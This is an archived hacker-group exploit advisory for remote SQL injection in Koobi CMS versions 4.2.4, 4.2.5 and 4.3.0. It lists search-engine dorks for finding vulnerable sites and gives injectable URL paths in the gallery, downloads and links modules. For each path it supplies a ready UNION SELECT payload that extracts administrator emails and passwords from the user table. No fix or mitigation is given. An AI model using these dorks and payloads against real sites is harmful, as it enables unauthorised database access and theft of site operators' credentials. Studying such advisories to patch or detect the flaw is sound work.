Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx2816.htm

Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities



Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities
Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities



--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--=0D 
--==+             Koobi CMS 4.3.0, 4.2.5, 4.2.4 Multiple Remote SQL Injection            +==--=0D
--==+====================================================================================+==--=0D
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]=0D
=0D
[+] Info:=0D
=0D
[~] Software: Koobi CMS 4.3.0, 4.2.5, 4.2.4=0D
[~] HomePage: http://www.dream4.de/=0D 
[~] Exploit: Remote SQL Injection [High]=0D
[~] Where: index.php=0D
[~] Bug Found By: JosS=0D
[~] Contact: sys-project[at]hotmail.com=0D
[~] Web: http://www.spanish-hackers.com=0D 
=0D
[+] Dorks:=0D
=0D
[~] Koobi CMS 4.3.0: "powered by koobi-cms 4.3.0"=0D
[~] Koobi CMS 4.2.5: "powered by koobi-cms 4.2.5"=0D
[~] Koobi CMS 4.2.4: "powered by koobi-cms 4.2.4"=0D
=0D
[+] Exploits for 4.3.0:=0D
=0D
[~] Module: gallery=0D
[~] /index.php?area=1&p=gallery&action=showimages&galid=[SQL]=0D
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*=0D
=0D
[~] Module: downloads=0D
[~] /index.php?showfile=1&fid=31&p=downloads&area=1&categ=[SQL]=0D
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*=0D
=0D
[+] Exploits for 4.2.5:=0D
=0D
[~] Module: links=0D
[~] /index.php?showlink=1&fid=1&p=links&area=1&categ=[SQL]=0D
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*=0D
=0D
[~] Module: downloads=0D
[~] /index.php?showfile=1&fid=1&p=downloads&area=1&categ=[SQL]=0D
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*=0D
=0D
[+] Exploits for 4.2.4:=0D
=0D
[~] Module: downloads=0D
[~] /index.php?showfile=1&fid=31&p=downloads&area=1&categ=[SQL]=0D
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*=0D
=0D
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--=0D 
--==+                                       JosS                                         +==--=0D
--==+====================================================================================+==--=0D
                                       [+] [The End]


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH